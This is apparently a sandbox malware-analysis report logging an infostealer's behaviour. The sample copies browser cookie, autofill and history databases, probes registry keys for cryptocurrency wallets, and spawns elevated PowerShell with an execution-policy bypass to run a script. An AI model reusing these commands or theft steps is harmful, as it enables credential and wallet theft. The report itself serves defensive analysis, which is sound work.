File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-journal, type = file_attributes False 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 1024, size_out = 1024 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-journal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 16, size_out = 16 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 1024, size_out = 1024 True 1
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp True 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\cookies.sqlite, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, type = file_attributes True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, size = 100, size_out = 100 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-journal, type = file_attributes False 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, size = 32768, size_out = 32768 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal, type = file_attributes False 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm, type = file_attributes False 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, size = 32768, size_out = 32768 True 2
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm True 1
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal True 1
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp True 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, type = file_attributes True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 100, size_out = 100 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-journal, type = file_attributes False 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 2048, size_out = 2048 True 4
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-journal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 16, size_out = 16 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 2048, size_out = 2048 True 1
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp True 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, type = file_attributes True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 100, size_out = 100 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-journal, type = file_attributes False 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 2048, size_out = 2048 True 4
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-journal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 16, size_out = 16 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 2048, size_out = 2048 True 1
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp True 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\History, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, type = file_attributes True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 100, size_out = 100 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-journal, type = file_attributes False 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 4096, size_out = 4096 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-journal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 16, size_out = 16 True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-wal, type = file_attributes False 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 4096, size_out = 4096 True 3
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\monero-project\monero-core False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\monero-project\monero-core, value_name = wallet_path, data = 0 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt, value_name = strDataDir, data = 0 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt, value_name = strDataDir, data = 0 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt, value_name = strDataDir, data = 0 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt, value_name = strDataDir, data = 0 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt, value_name = strDataDir, data = 0 False 1
Thread 0xacc
Category Operation Information Success Count Logfile
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Process #13: powershell.exe
Information Value
ID #13
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:03, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xa4c
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA50, 0xA94, 0xA98, 0xA9C, 0xAA0, 0xAA4
Process #14: powershell.exe
Information Value
ID #14
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\
Monitor Start Time: 00:01:15, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xb04
Parent PID 0xa0c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xB10, 0xB08
Process #16: killeryuga.exe
Information Value
ID #16
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:56, Reason: Autostart
Unmonitor End Time: 00:03:19, Reason: Self Terminated
Monitor Duration 00:00:23
OS Process Information
Information Value
PID 0x780
Parent PID 0x6f8 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x784, 0x7CC, 0x4BC, 0x4F0, 0x4F4, 0x4A8, 0x4B0, 0x494, 0x498, 0x4B4, 0x4E8, 0x5B0
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x00904260 0x00943193 Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042A000 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004135F0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040C4E0 False
Threads
Thread 0x784
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x75363c5a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x7538a959 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x7538a842 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x75388266 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x753e45ef True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75361245 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x753e7198 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x753e75fe True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x753ed232 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x7538d594 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x753613f0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x753ed2d2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x7536418b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x7538bc39 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x753612fc True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75361462 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x7536cb29 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x75360e00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75361400 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75364a2d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x753635b7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x76f5cc89 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Module Load module_name = GDI32.dll, base_address = 0x76a80000 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x76ac4124 True 1
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x76a97590 True 1
Fn
